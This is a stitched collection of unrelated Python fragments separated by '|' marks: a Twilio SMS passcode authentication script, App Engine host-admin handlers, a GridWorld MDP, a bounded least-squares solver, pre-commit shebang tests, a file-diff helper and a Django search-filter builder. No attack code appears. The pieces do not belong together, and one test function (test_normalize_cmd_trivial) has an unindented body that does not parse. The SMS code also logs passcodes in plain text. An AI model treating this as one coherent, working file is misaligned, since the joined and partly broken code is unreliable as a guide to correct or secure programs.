            else:
                return "/casa/otp_sms_prompt.xhtml"
        elif step == 3:
            return defPage
        return ""
    def logout(self, configurationAttributes, requestParameters):
        return True
    def hasEnrollments(self, configurationAttributes, user):
        # Enrollment requires at least one mobile number on the user entry.
        return user.getAttribute("mobile") != None
    def sendMessage(self, code, numb):
        # Best-effort delivery: errors are printed, never propagated.
        try:
            if numb[:1] != "+":
                numb = "+" + numb
            print "TwilioSMS. Sending SMS message (%s) to %s" % (code, numb)
            msg = "%s is your passcode to access your account" % code
            message = TwMessage.creator(PhoneNumber(numb), PhoneNumber(self.from_no), msg).create()
            print "TwilioSMS. Message Sid: %s" % message.getSid()
        except:
            print "TwilioSMS. Error sending message", sys.exc_info()[1]
|
from db_utils import deleteLinksByHost
from db_utils import deleteHost
from db_utils import addNewHost
from db_utils import getAllHosts
from error_message import showErrorPage
from error_message import ErrorMessages
import utils
import webapp2
from google.appengine.api import users
from google.appengine.ext import ndb
# Shared Jinja2 environment used to render the admin templates.
JINJA_ENVIRONMENT = utils.getJinjaEnvironment()
class AddHost(webapp2.RequestHandler):
    def get(self):
        """
        description:
            adds a new host to the database, and redirect to '/'
        params:
            name - host name
            interval - pinging interval for all the links belonging to the host.
        response:
            redirect to '/admin'
        """
        name = self.request.get('name')
        # Reject missing or empty host names (webapp2 returns '' when absent).
        if not name:
            showErrorPage(self, ErrorMessages.invalidHostName())
            return
        # Reject duplicates: a Host entity keyed by this name already exists.
        if ndb.Key('Host', name).get() is not None:
            showErrorPage(self, ErrorMessages.duplicatingHostName())
            return
        try:
            interval = int(self.request.get('interval'))
        except ValueError:
            showErrorPage(self, ErrorMessages.invalidHostInterval())
            return
        # BUG FIX: a pinging interval must be strictly positive; the original
        # check only rejected 0, letting negative intervals through.
        if interval <= 0:
            showErrorPage(self, ErrorMessages.invalidHostInterval())
            return
        addNewHost(name, interval)
        self.redirect('/admin')
class DeleteHost(webapp2.RequestHandler):
    """Deletes a host and every link that belongs to it."""

    def get(self):
        """
        description:
            deletes an existing host, and redirects to '/'. All the links
            belonging to the host will also be deleted.
        params:
            name - host name
        response:
            redirect to '/'
        """
        host_name = self.request.get('name')
        if host_name is None or len(host_name) == 0:
            showErrorPage(self, ErrorMessages.invalidHostName())
            return
        if ndb.Key('Host', host_name).get() is None:
            showErrorPage(self, ErrorMessages.hostDoesNotExist())
            return
        # Remove the dependent links first, then the host entity itself.
        deleteLinksByHost(host_name)
        deleteHost(host_name)
        self.redirect('/')
class AdminPage(webapp2.RequestHandler):
    """Renders the admin overview page listing all hosts."""

    def get(self):
        # Collect the current user and host list for the template context.
        template_values = {
            'hosts': getAllHosts(),
            'user': users.get_current_user(),
        }
        template = JINJA_ENVIRONMENT.get_template('admin.html')
        self.response.write(template.render(template_values))
# WSGI routes for the admin host-management endpoints.
app = webapp2.WSGIApplication([
    ('/admin/host/add', AddHost),
    ('/admin/host/delete', DeleteHost),
], debug=True)
|
from mdp import MDP
from grid import Grid
from scipy.stats import uniform
from scipy.stats import beta
from scipy.stats import expon
import numpy as np
import random
import pyprind
import matplotlib.pyplot as plt
class GridWorld(MDP):
    """
    Defines a gridworld environment to be solved by an MDP!

    States are the cells of a row x col grid plus one absorbing "death"
    state appended at the end. Actions 0-8 are:
    {0: up, 1: down, 2: left, 3: right, 4: stay,
     5: up-left, 6: up-right, 7: down-left, 8: down-right}.
    """
    def __init__(self, grid, goalVals, discount=.99, tau=.01, epsilon=.001):
        MDP.__init__(self, discount=discount, tau=tau, epsilon=epsilon)
        self.goalVals = goalVals
        self.grid = grid
        # Build states/actions/rewards/transitions, then solve immediately.
        self.setGridWorld()
        self.valueIteration()
        self.extractPolicy()

    def isTerminal(self, state):
        """
        Specifies terminal conditions for gridworld.

        A state is terminal when its coordinate is one of the grid's
        object (goal) cells.
        """
        return tuple(self.scalarToCoord(state)) in self.grid.objects.values()

    def isObstacle(self, sCoord):
        """
        Checks if a state is a wall or obstacle.

        Out-of-bounds coordinates also count as obstacles.
        """
        if tuple(sCoord) in self.grid.walls:
            return True
        if sCoord[0] > (self.grid.row - 1) or sCoord[0] < 0:
            return True
        if sCoord[1] > (self.grid.col - 1) or sCoord[1] < 0:
            return True
        return False

    def takeAction(self, sCoord, action):
        """
        Receives an action value, performs associated movement.

        BUG FIX: the integer comparisons use ``==``; the original used
        ``is``, which only works for small ints via CPython's int caching
        and is not guaranteed by the language.
        """
        if action == 0:
            return self.up(sCoord)
        if action == 1:
            return self.down(sCoord)
        if action == 2:
            return self.left(sCoord)
        if action == 3:
            return self.right(sCoord)
        if action == 4:
            return sCoord
        if action == 5:
            return self.upleft(sCoord)
        if action == 6:
            return self.upright(sCoord)
        if action == 7:
            return self.downleft(sCoord)
        if action == 8:
            return self.downright(sCoord)

    def _shift(self, sCoord, dRow, dCol):
        """
        Apply a (row, col) offset to a state coordinate.

        Returns a NEW array on success, or the ORIGINAL ``sCoord`` object
        when the move hits a wall/obstacle -- getPossibleActions relies on
        this identity to detect blocked moves.
        """
        newCoord = np.copy(sCoord)
        newCoord[0] += dRow
        newCoord[1] += dCol
        if not self.isObstacle(newCoord):
            return newCoord
        return sCoord

    def up(self, sCoord):
        """
        Move agent up, uses state coordinate.
        """
        return self._shift(sCoord, -1, 0)

    def upright(self, sCoord):
        """
        Move agent up and right, uses state coordinate.
        """
        return self._shift(sCoord, -1, 1)

    def upleft(self, sCoord):
        """
        Move agent up and left, uses state coordinate.
        """
        return self._shift(sCoord, -1, -1)

    def down(self, sCoord):
        """
        Move agent down, uses state coordinate.
        """
        return self._shift(sCoord, 1, 0)

    def downleft(self, sCoord):
        """
        Move agent down and left, uses state coordinate.
        """
        return self._shift(sCoord, 1, -1)

    def downright(self, sCoord):
        """
        Move agent down and right, uses state coordinate.
        """
        return self._shift(sCoord, 1, 1)

    def left(self, sCoord):
        """
        Move agent left, uses state coordinate.
        """
        return self._shift(sCoord, 0, -1)

    def right(self, sCoord):
        """
        Move agent right, uses state coordinate.
        """
        return self._shift(sCoord, 0, 1)

    def coordToScalar(self, sCoord):
        """
        Convert state coordinates to corresponding scalar state value.
        """
        return sCoord[0] * (self.grid.col) + sCoord[1]

    def scalarToCoord(self, scalar):
        """
        Convert scalar state value into coordinates.

        BUG FIX: floor division (``//``) keeps the row index an integer
        under Python 3; plain ``/`` produced float coordinates, which break
        the tuple-membership tests in isTerminal/isObstacle.
        """
        return np.array([scalar // self.grid.col, scalar % self.grid.col])

    def getPossibleActions(self, sCoord):
        """
        Will return a list of all possible actions from a current state.

        A move is possible when the movement helper returns a new object;
        blocked moves return the identical ``sCoord`` object (see _shift).
        """
        possibleActions = list()
        if self.up(sCoord) is not sCoord:
            possibleActions.append(0)
        if self.down(sCoord) is not sCoord:
            possibleActions.append(1)
        if self.left(sCoord) is not sCoord:
            possibleActions.append(2)
        if self.right(sCoord) is not sCoord:
            possibleActions.append(3)
        if self.upleft(sCoord) is not sCoord:
            possibleActions.append(5)
        if self.upright(sCoord) is not sCoord:
            possibleActions.append(6)
        if self.downleft(sCoord) is not sCoord:
            possibleActions.append(7)
        if self.downright(sCoord) is not sCoord:
            possibleActions.append(8)
        return possibleActions

    def setGridWorld(self):
        """
        Initializes states, actions, rewards, transition matrix.
        """
        # Possible coordinate positions + Death State
        self.s = np.arange(self.grid.row * self.grid.col + 1)
        # 9 actions: 4 cardinal moves, stay, and 4 diagonal moves.
        self.a = np.arange(9)
        # Reward Zones: goal value placed at each object's cell.
        self.r = np.zeros(len(self.s))
        # BUG FIX: wrap in list() so indexing works on Python 3 dict views.
        objectCoords = list(self.grid.objects.values())
        for i in range(len(objectCoords)):
            self.r[self.coordToScalar(objectCoords[i])] = self.goalVals[i]
        # Per state-action reward: landing-cell reward minus a step cost of
        # 1 for cardinal/stay actions (j <= 4) or sqrt(2) for diagonals.
        self.r_sa = np.zeros([len(self.s), len(self.a)])
        for i in range(len(self.s)):
            for j in range(len(self.a)):
                cost = 1.0 if j <= 4 else np.sqrt(2)
                landing = self.takeAction(self.scalarToCoord(i), j)
                self.r_sa[i][j] = self.r[self.coordToScalar(landing)] - cost
        self.r = self.r_sa
        # Deterministic transition matrix.
        self.t = np.zeros([len(self.s), len(self.a), len(self.s)])
        for state in range(len(self.s)):
            if self.isTerminal(state):
                # Terminal cells: "stay" self-loops; every other action
                # leads to the absorbing death state (last index).
                for i in range(len(self.a)):
                    if i == 4:
                        self.t[state][4][state] = 1.0
                    else:
                        self.t[state][i][len(self.s) - 1] = 1.0
                continue
            for action in self.a:
                if action == 4:
                    self.t[state][action][state] = 1.0
                else:
                    nextState = self.takeAction(self.scalarToCoord(state), action)
                    self.t[state][action][self.coordToScalar(nextState)] = 1.0

    def simulate(self, state):
        """
        Runs the solver for the MDP, conducts value iteration, extracts policy,
        then runs simulation of problem.

        NOTE: Be sure to run value iteration (solve values for states) and to
        extract some policy (fill in policy vector) before running simulation

        Returns the accumulated path cost (diagonal steps count sqrt(2)).
        """
        count = 0
        while not self.isTerminal(state):
            # Sample an action in proportion to the policy weights for the state.
            stateIndex = np.where(self.s == state)[0][0]
            policy = self.policy[stateIndex]
            p_policy = policy / policy.sum()
            policyChoice = np.random.choice(policy, p=p_policy)
            actionIndex = np.random.choice(
                np.array(np.where(self.policy[state][:] == policyChoice)).ravel())
            # NOTE(review): actions 0-3 cost 1 and everything else sqrt(2),
            # which also prices the "stay" action (4) at sqrt(2); setGridWorld
            # prices stay at 1 -- possibly inconsistent, kept as in the original.
            if actionIndex <= 3:
                count += 1
            else:
                count += np.sqrt(2)
            # Take an action, move to next state.
            nextState = self.takeAction(self.scalarToCoord(int(stateIndex)),
                                        int(actionIndex))
            state = int(self.coordToScalar(nextState))
        return count
|
from fam.buffer import buffered_db

# Module-level alias: expose the buffered database under the name `cache`.
cache = buffered_db
|
"""
Created on Thu May 05 20:02:00 2011
@author: Tillsten
"""
import numpy as np
from scipy.linalg import qr
# Machine epsilon for float64, used as a numerical tolerance by the solver.
eps = np.finfo(float).eps
def mls(B, v, umin, umax, Wv=None, Wu=None, ud=None, u=None, W=None, imax=100):
    """
    mls - Control allocation using minimal least squares.

    [u,W,iter] = mls_alloc(B,v,umin,umax,[Wv,Wu,ud,u0,W0,imax])

    Solves the bounded sequential least-squares problem

        min ||Wu(u-ud)||  subj. to  u in M

    where M is the set of control signals solving

        min ||Wv(Bu-v)||  subj. to  umin <= u <= umax

    using a two stage active set method. Wu must be diagonal since the
    problem is reformulated as a minimal least squares problem. The
    implementation does not handle the case of coplanar controls.

    Inputs:
    -------
    B     control effectiveness matrix (k x m)
    v     commanded virtual control (k x 1)
    umin  lower position limits (m x 1)
    umax  upper position limits (m x 1)
    Wv    virtual control weighting matrix (k x k) [I]
    Wu    control weighting matrix (m x m), diagonal [I]
    ud    desired control (m x 1) [0]
    u     initial point (m x 1)
    W     initial working set (m x 1) [empty]
    imax  max no. of iterations [100]

    Outputs:
    -------
    u     optimal control

    Active set syntax: W_i =  0 if u_i not saturated
                             -1 if u_i = umin_i
                             +1 if u_i = umax_i

    Directly based on the code from:
    Ola Harkegard, www.control.isy.liu.se/~ola -- see licence.
    """
    # Dual-feasibility tolerance (machine epsilon for float64).
    eps = np.finfo(float).eps
    # k = number of virtual controls, m = number of variables (actuators).
    k, m = B.shape
    # BUG FIX: use `is None` for the default checks. `== None` on an
    # ndarray argument is an elementwise comparison whose truth value
    # raises ValueError.
    if u is None:
        u = np.mean(umin + umax, 0)[:, None]
    if W is None:
        W = np.zeros((m, 1))
    if ud is None:
        ud = np.zeros((m, 1))
    if Wu is None:
        Wu = np.eye(m)
    if Wv is None:
        Wv = np.eye(k)
    phase = 1
    # Reformulate as a minimal least squares problem. See 2002-03-08 (1).
    A = Wv.dot(B).dot(np.linalg.pinv(Wu))
    b = Wv.dot(v - B.dot(ud))
    xmin = (umin - ud).flatten()
    xmax = (umax - ud).flatten()
    # Compute initial point and residual.
    x = Wu.dot(u - ud)
    r = np.atleast_2d(A.dot(x) - b)
    # Determine indices of free variables.
    i_free = (W == 0).flatten()
    m_free = np.sum(i_free)
    for i in range(imax):
        # Compute the optimal perturbation p for the current working set.
        if phase == 1:
            A_free = A[:, i_free]
            if m_free <= k:
                if m_free > 0:
                    p_free = np.linalg.lstsq(-A_free, r, rcond=None)[0]
            else:
                q1, r1 = qr(A_free.T)
                # BUG FIX: np.solve does not exist -- the triangular solve
                # must go through np.linalg.solve.
                p_free = -q1.dot(np.linalg.solve(r1.T, r))
            p = np.zeros((m, 1))
            if A.shape[1] > 1:
                p[i_free] = p_free
            else:
                p[i_free] = p_free.flatten()
        else:
            i_fixed = np.logical_not(i_free)
            m_fixed = m - m_free
            if m_fixed > 0:
                HT = U[i_fixed.squeeze(), :].T
                V, Rtot = qr(np.atleast_2d(HT))
                V1 = V[:, :m_fixed]
                V2 = V[:, m_fixed + 1:]
                R = Rtot[:, m_fixed]
            else:
                V, Rtot = np.array([[]]), np.array([[]])
                V1 = V2 = R = V.T
            s = -V2.T.dot(z)
            pz = V2.dot(s)
            p = U.dot(pz)
        # Is the optimal perturbation feasible for the free variables?
        x_opt = x + p
        infeasible = np.logical_or(x_opt < xmin, x_opt > xmax)
        if not np.any(infeasible[i_free]):
            # Yes: accept it and update the residual of the active phase.
            x = x_opt
            if phase == 1:
                r = r + A.dot(p)
            else:
                z = z + pz
            if phase == 1 and m_free >= k:
                # Enough free variables to satisfy Bu = v exactly: switch to
                # phase 2 and optimize within the null space of A.
                phase = 2
                Utot, Stot = qr(A.T)
                U = Utot[:, k:]
                z = U.T.dot(x)
            else:
                # Check the Lagrange multipliers of the saturated bounds.
                lam = np.zeros((m, 1))
                if m_free < m:
                    if phase == 1:
                        g = A.T.dot(r)
                        lam = -W * g
                    else:
                        lam[i_fixed] = -W[i_fixed] * np.linalg.solve(R, V1.T.dot(z))
                if np.all(lam >= -eps):
                    # All multipliers non-negative: optimum found.
                    return np.linalg.solve(Wu, x) + ud
                # Release the variable with the most negative multiplier.
                i_neg = np.argmin(lam)
                W[i_neg] = 0
                i_free[i_neg] = True
                m_free += 1
        else:
            # No: move as far as possible along p and saturate the variable
            # that hits its bound first.
            dist = np.ones(m)
            i_min = np.logical_and(i_free, p.flat < 0).flatten()
            i_max = np.logical_and(i_free, p.flat > 0).flatten()
            # BUG FIX: flatten x and p before the masked arithmetic; mixing
            # (m, 1) and (m,) arrays here broadcast to (n, n) and broke the
            # assignment whenever more than one variable was infeasible.
            x_flat = x.flatten()
            p_flat = p.flatten()
            dist[i_min] = (xmin[i_min] - x_flat[i_min]) / p_flat[i_min]
            dist[i_max] = (xmax[i_max] - x_flat[i_max]) / p_flat[i_max]
            alpha, i_alpha = np.min(dist), np.argmin(dist)
            x = x + alpha * p
            if phase == 1:
                r = r + A.dot(alpha * p)
            else:
                z = z + alpha * pz
            W[i_alpha] = np.sign(p[i_alpha])
            if i_free[i_alpha]:
                i_free[i_alpha] = False
                m_free -= 1
    # Iteration limit reached: return the best point found so far.
    u = np.linalg.solve(Wu, x) + ud
    return u
def bounded_lsq(A, b, lower_lim, upper_lim):
    """
    Minimizes:
    |Ax-b|_2
    for lower_lim<x<upper_lim.
    """
    # Thin wrapper: delegates to the active-set solver with default weights.
    return mls(A, b, lower_lim, upper_lim)
def test_bounded_lsq():
    """Smoke tests for bounded_lsq on a 1-D and a 2-D problem."""
    # FIX: removed the unused `from numpy.core.umath_tests import
    # matrix_multiply` import -- it is only needed by the plotting demo.
    s = np.linspace(0, 10, 100)
    A = np.exp(-((s - 5) ** 2) / 20)
    A = A[:, None]
    b = 16 * A
    # The unconstrained optimum (16) exceeds the upper bound, so the
    # solution must saturate at 15.
    x = bounded_lsq(A, b, np.atleast_2d(0), np.atleast_2d(15))
    np.testing.assert_almost_equal(x, 15)
    A = np.array([[1, -3], [5, 7]])
    b = np.array([[-50], [50]])
    ll = np.array(([[-10], [-10]]))
    ul = np.array(([[10], [10]]))
    x0 = bounded_lsq(A, b, ll, ul)
    np.testing.assert_array_almost_equal(x0, np.array([[-4.61538462], [10.]]))
if __name__ == '__main__':
    from numpy.core.umath_tests import matrix_multiply
    import matplotlib.pyplot as plt
    test_bounded_lsq()
    # 1-D demo: fit a scaled Gaussian with the solution clipped at 4.
    s = np.linspace(0, 10, 100)
    A = np.exp(-((s - 5) ** 2) / 20)
    A = A[:, None]
    b = 16 * A
    x = bounded_lsq(A, b, np.atleast_2d(0), np.atleast_2d(4))
    plt.plot(A.dot(x))
    plt.plot(b)
    plt.figure()
    plt.rcParams['font.family'] = 'serif'
    # 2-D demo: visualize the residual landscape with the bounded and the
    # unconstrained least-squares minima annotated.
    A = np.array([[1, -3], [5, 7]])
    b = np.array([[-50], [50]])
    ll = np.array(([[-10], [-10]]))
    ul = np.array(([[10], [10]]))
    Ud = np.array(([0, 0]))
    gamma = 1000
    x0 = bounded_lsq(A, b, ll, ul)
    x = np.linspace(-30, 30, 500)
    y = np.linspace(-30, 30, 500)
    X, Y = np.meshgrid(x, y)
    S = np.dstack((X, Y))
    SN = matrix_multiply(S, A.T)
    plt.clf()
    # Contour plot of ||A s - b|| over the plane.
    plt.contourf(x, y, np.sqrt(((SN - b.T) ** 2).sum(-1)), 30,
                 cmap=plt.cm.PuBu_r)
    plt.colorbar()
    # Draw the feasible box defined by the bounds.
    rect = np.vstack((ll, ul - ll))
    patch = plt.Rectangle(ll, *(ul - ll), facecolor=(0.0, 0., 0., 0))
    plt.gca().add_patch(patch)
    plt.annotate("Bounded Min",
                 xy=x0, xycoords='data',
                 xytext=(-5, 5), textcoords='data',
                 arrowprops=dict(arrowstyle="->",
                                 connectionstyle="arc3"),
                 )
    plt.annotate("Lsq Min",
                 xy=np.linalg.lstsq(A, b)[0], xycoords='data',
                 xytext=(20, 10), textcoords='offset points',
                 arrowprops=dict(arrowstyle="->",
                                 connectionstyle="arc3"),
                 )
    plt.scatter(*x0)
    plt.scatter(*np.linalg.lstsq(A, b)[0])
    plt.show()
|
from __future__ import annotations
import contextlib
import os.path
import shutil
import sys
import pytest
from pre_commit import parse_shebang
from pre_commit.envcontext import envcontext
from pre_commit.envcontext import Var
from pre_commit.util import make_executable
def _echo_exe() -> str:
    """Locate `echo` on PATH; fail loudly if it is somehow missing."""
    located = shutil.which('echo')
    assert located is not None
    return located
def test_file_doesnt_exist():
    # A missing file yields an empty tuple rather than raising.
    assert parse_shebang.parse_filename('herp derp derp') == ()
def test_simple_case(tmpdir):
    # The shebang interpreter of an executable file is returned.
    x = tmpdir.join('f')
    x.write('#!/usr/bin/env echo')
    make_executable(x.strpath)
    assert parse_shebang.parse_filename(x.strpath) == ('echo',)
def test_find_executable_full_path():
    # An absolute path to an existing executable is returned unchanged.
    assert parse_shebang.find_executable(sys.executable) == sys.executable
def test_find_executable_on_path():
    assert parse_shebang.find_executable('echo') == _echo_exe()
def test_find_executable_not_found_none():
    assert parse_shebang.find_executable('not-a-real-executable') is None
def write_executable(shebang, filename='run'):
    """Create ``bin/<filename>`` containing only a shebang line, mark it
    executable, and return its relative path."""
    os.mkdir('bin')
    target = os.path.join('bin', filename)
    with open(target, 'w') as fh:
        fh.write(f'#!{shebang}')
    make_executable(target)
    return target
@contextlib.contextmanager
def bin_on_path():
    # Temporarily prepend the cwd-relative `bin` directory to PATH.
    bindir = os.path.join(os.getcwd(), 'bin')
    with envcontext((('PATH', (bindir, os.pathsep, Var('PATH'))),)):
        yield
def test_find_executable_path_added(in_tmpdir):
    # The executable is only discoverable once its directory is on PATH.
    path = os.path.abspath(write_executable('/usr/bin/env sh'))
    assert parse_shebang.find_executable('run') is None
    with bin_on_path():
        assert parse_shebang.find_executable('run') == path
def test_find_executable_path_ext(in_tmpdir):
    """Windows exports PATHEXT as a list of extensions to automatically add
    to executables when doing PATH searching.
    """
    exe_path = os.path.abspath(
        write_executable('/usr/bin/env sh', filename='run.myext'),
    )
    env_path = {'PATH': os.path.dirname(exe_path)}
    env_path_ext = dict(env_path, PATHEXT=os.pathsep.join(('.exe', '.myext')))
    # Without PATHEXT, only the exact filename (with extension) matches.
    assert parse_shebang.find_executable('run') is None
    assert parse_shebang.find_executable('run', _environ=env_path) is None
    ret = parse_shebang.find_executable('run.myext', _environ=env_path)
    assert ret == exe_path
    # With PATHEXT, the bare name resolves through the listed extensions.
    ret = parse_shebang.find_executable('run', _environ=env_path_ext)
    assert ret == exe_path
def test_normexe_does_not_exist():
    # A bare name that cannot be resolved raises OSError with a clear message.
    with pytest.raises(OSError) as excinfo:
        parse_shebang.normexe('i-dont-exist-lol')
    assert excinfo.value.args == ('Executable `i-dont-exist-lol` not found',)
def test_normexe_does_not_exist_sep():
    # Same failure mode for an explicit relative path.
    with pytest.raises(OSError) as excinfo:
        parse_shebang.normexe('./i-dont-exist-lol')
    assert excinfo.value.args == ('Executable `./i-dont-exist-lol` not found',)
@pytest.mark.xfail(os.name == 'nt', reason='posix only')
def test_normexe_not_executable(tmpdir):  # pragma: win32 no cover
    # An existing but non-executable file is rejected (posix semantics).
    tmpdir.join('exe').ensure()
    with tmpdir.as_cwd(), pytest.raises(OSError) as excinfo:
        parse_shebang.normexe('./exe')
    assert excinfo.value.args == ('Executable `./exe` is not executable',)
def test_normexe_is_a_directory(tmpdir):
    with tmpdir.as_cwd():
        tmpdir.join('exe').ensure_dir()
        exe = os.path.join('.', 'exe')
        with pytest.raises(OSError) as excinfo:
            parse_shebang.normexe(exe)
        msg, = excinfo.value.args
        assert msg == f'Executable `{exe}` is a directory'
def test_normexe_already_full_path():
    assert parse_shebang.normexe(sys.executable) == sys.executable
def test_normexe_gives_full_path():
    # Bare names on PATH are resolved to an absolute path.
    assert parse_shebang.normexe('echo') == _echo_exe()
    assert os.sep in _echo_exe()
def test_normalize_cmd_trivial():
cmd = (_echo_exe(), 'hi')
assert parse_shebang.normalize_cmd(cmd) == cmd
def test_normalize_cmd_PATH():
    """A bare executable name is replaced with its resolved full path."""
    cmd = ('echo', '--version')
    expected = (_echo_exe(), '--version')
    assert parse_shebang.normalize_cmd(cmd) == expected
def test_normalize_cmd_shebang(in_tmpdir):
    """The script's shebang interpreter is prepended to the command."""
    echo = _echo_exe().replace(os.sep, '/')
    path = write_executable(echo)
    assert parse_shebang.normalize_cmd((path,)) == (echo, path)
def test_normalize_cmd_PATH_shebang_full_path(in_tmpdir):
    """A PATH-resolved script keeps its shebang interpreter and is
    normalized to its absolute path."""
    echo = _echo_exe().replace(os.sep, '/')
    path = write_executable(echo)
    with bin_on_path():
        ret = parse_shebang.normalize_cmd(('run',))
    assert ret == (echo, os.path.abspath(path))
def test_normalize_cmd_PATH_shebang_PATH(in_tmpdir):
    """A `/usr/bin/env` shebang is itself resolved through PATH."""
    echo = _echo_exe()
    path = write_executable('/usr/bin/env echo')
    with bin_on_path():
        ret = parse_shebang.normalize_cmd(('run',))
    assert ret == (echo, os.path.abspath(path))
|
r"""
# .---. .-----------
# / \ __ / ------
# / / \( )/ ----- (`-') _ _(`-') <-. (`-')_
# ////// '\/ ` --- ( OO).-/( (OO ).-> .-> \( OO) ) .->
# //// / // : : --- (,------. \ .'_ (`-')----. ,--./ ,--/ ,--.' ,-.
# // / / / `\/ '-- | .---' '`'-..__)( OO).-. ' | \ | | (`-')'.' /
# // //..\\ (| '--. | | ' |( _) | | | | . '| |)(OO \ /
# ============UU====UU==== | .--' | | / : \| |)| | | |\ | | / /)
# '//||\\` | `---. | '-' / ' '-' ' | | \ | `-/ /`
# ''`` `------' `------' `-----' `--' `--' `--'
# ######################################################################################
#
# Author: edony - edonyzpc@gmail.com
#
# twitter : @edonyzpc
#
# Last modified: 2015-05-10 15:02
#
# Filename: filebuf.py
#
# Description: All Rights Are Reserved
#
"""
class PyColor(object):
    """Helper for colored printing in the Python interpreter.

    "F3" call Addpy() function to add this class which is defined
    in the .vimrc for vim Editor.
    """
    def __init__(self):
        # ANSI escape-code reference table, kept on the instance so it can
        # be read interactively.
        self.self_doc = r"""
        STYLE: \033['display model';'foreground';'background'm
        DETAILS:
        FOREGROUND        BACKGOUND       COLOR
        ---------------------------------------
        30                40              black
        31                41              red
        32                42              green
        33                43              yellow
        34                44              blue
        35                45              purple
        36                46              cyan
        37                47              white
        DISPLAY MODEL    DETAILS
        -------------------------
        0                default
        1                highlight
        4                underline
        5                flicker
        7                reverse
        8                non-visiable
        e.g:
        \033[1;31;40m <!--1-highlight;31-foreground red;40-background black-->
        \033[0m <!--set all into default-->
        """
        # Preset escape sequences: white-on-red warning, red-on-green tip,
        # and the "reset everything" terminator.
        self.warningcolor, self.tipcolor, self.endcolor = (
            '\033[0;37;41m',
            '\033[0;31;42m',
            '\033[0m',
        )
        self._newcolor = ''
    @property
    def new(self):
        """A user-customized print color (escape sequence string)."""
        return self._newcolor
    @new.setter
    def new(self, color_str):
        """Install a new custom color escape sequence."""
        self._newcolor = color_str
    def disable(self):
        """Disable colored printing by blanking the warning/end sequences.

        NOTE(review): tipcolor and the custom color are left untouched.
        """
        self.warningcolor = self.endcolor = ''
class FileBuf(object):
    """Collect the differing lines of two text files into a buffer.

    Each differing line is prefixed with its 1-based line number and a
    marker: '-' when file1 has more lines than file2, '+' otherwise.
    The buffer can then be flushed to a file named `tmp` in the current
    directory via write_file().
    """
    def __init__(self, file1, file2):
        """Remember both file names and count their lines.

        Attributes: file1, file2, file1_line_num, file2_line_num, buffer.
        """
        self.file1 = file1
        self.file2 = file2
        # Use context managers so the handles are closed deterministically
        # (the original left them open until garbage collection).
        with open(self.file1) as stream:
            self.file1_line_num = len(stream.readlines())
        with open(self.file2) as stream:
            self.file2_line_num = len(stream.readlines())
        self.buffer = []
    def mark_diff(self):
        """Mark up the different lines into the buffer.

        Iterates over the longer file (file2 wins ties) so every one of its
        lines is compared; the shorter file yields '' past EOF, which is
        normalized to a bare newline.
        """
        with open(self.file1) as f1, open(self.file2) as f2:
            if self.file1_line_num > self.file2_line_num:
                self._collect(f1, f2, '-', file1_iterated=True)
            else:
                self._collect(f2, f1, '+', file1_iterated=False)
    def _collect(self, iterated, stepped, marker, file1_iterated):
        """Compare `iterated` line-by-line against `stepped`, appending
        annotated mismatched pairs to the buffer (file1's line first)."""
        line_num = 0
        for lead in iterated.readlines():
            follow = stepped.readline()
            line_num += 1
            if lead == follow:
                continue
            # Past EOF of the shorter file readline() returns '';
            # normalize so the output stays line-shaped.
            if lead == '':
                lead = lead + '\n'
            if follow == '':
                follow = follow + '\n'
            lead = str(line_num) + marker + lead
            follow = str(line_num) + marker + follow
            if file1_iterated:
                self.buffer.append(lead)
                self.buffer.append(follow)
            else:
                self.buffer.append(follow)
                self.buffer.append(lead)
    def write_file(self):
        """Write the buffer into buffer file `tmp` in the current directory."""
        # `with` guarantees the data is flushed and the handle closed
        # (the original never closed the handle, risking lost output).
        with open('tmp', 'w') as file_write:
            file_write.writelines(self.buffer)
if __name__ == '__main__':
    # Ad-hoc smoke test: diff two local files and dump the result to `tmp`.
    # Assumes f1.txt and f2.txt exist in the current directory.
    test_file_buf = FileBuf('f2.txt', 'f1.txt')
    test_file_buf.mark_diff()
    test_file_buf.write_file()
|
from django.db.models import fields, ForeignKey, ManyToOneRel, OneToOneRel
from .obj_types import clss
from .search_schema import schema as search_schema
def build_search_filters(cls):
    """Return list of dicts of options for a QueryBuilder filter.

    See https://querybuilder.js.org/#filters for details.
    """
    field_names = search_schema[cls.obj_type]["fields"]
    return [_build_search_filter(cls, name) for name in field_names]
def _build_search_filter(cls, field_name):
    """Build the QueryBuilder filter dict for one field of model `cls`.

    `bnf_code` is special-cased: it is a prefix search rather than a model
    field lookup.  Other fields are dispatched on their *exact* model field
    class — subclasses deliberately do not match, and an unsupported field
    type raises KeyError here.
    """
    if field_name == "bnf_code":
        return _build_search_filter_bnf_code_prefox()
    field = cls._meta.get_field(field_name)
    builder = {
        ForeignKey: _build_search_filter_fk,
        ManyToOneRel: _build_search_filter_rev_fk,
        OneToOneRel: _build_search_filter_rev_fk,
        fields.CharField: _build_search_filter_char,
        fields.DateField: _build_search_filter_date,
        fields.BooleanField: _build_search_filter_boolean,
        fields.DecimalField: _build_search_filter_decimal,
    }[type(field)]
    search_filter = builder(field)
    # QueryBuilder identifies filters by "id"; we use the model field name.
    search_filter["id"] = field_name
    return search_filter
def _build_search_filter_bnf_code_prefox():
return {
"id": "bnf_code",
"type": "string",
"label": "BNF code",
"operators": ["begins_with", "not_begins_with"],
"validation": {"min": 4},
}
def _build_search_filter_fk(field):
    """Build a select-box filter for a ForeignKey field.

    Choices are the related model's (cd, descr) pairs ordered by
    description; each is rendered as a single-entry {value: label} dict.
    """
    values = field.related_model.objects.values_list("cd", "descr").order_by("descr")
    values = [{r[0]: r[1]} for r in values]
    # The type is "string", even though the values are actually integers. This is
    # because the QueryBuilder library calls parseInt on any values produced by a filter
    # of type "integer" (see call to Utils.changeType in getRuleInputValue). It turns
    # out that parseInt cannot actually parse integers larger than
    # Number.MAX_SAFE_INTEGER, which is (2 ** 53) - 1, or 9007199254740991, and loses
    # precision when it tries. This is a problem, because certain dm+d models have
    # identifiers larger than Number.MAX_SAFE_INTEGER. Fortunately, Django is able to
    # deal with query parameters for integer fields that are submitted as strings.
    return {
        "type": "string",
        "label": field.help_text,
        "input": "select",
        "values": values,
        "operators": ["equal"],
        "plugin": "selectpicker",
        "plugin_config": {"liveSearch": True, "liveSearchStyle": "contains"},
    }
def _build_search_filter_rev_fk(field):
    """Build a filter for a reverse FK by looking through its intermediate model.

    Finds the single ForeignKey on the intermediate model that points at a
    lookup table (i.e. not at one of the dm+d classes in `clss`, and not a
    "prev" history link) and builds a select filter from it.
    """
    intermediate_model = field.related_model
    fk_fields = [
        f
        for f in intermediate_model._meta.get_fields()
        if (
            isinstance(f, ForeignKey)
            and f.related_model not in clss
            and "prev" not in f.name
        )
    ]
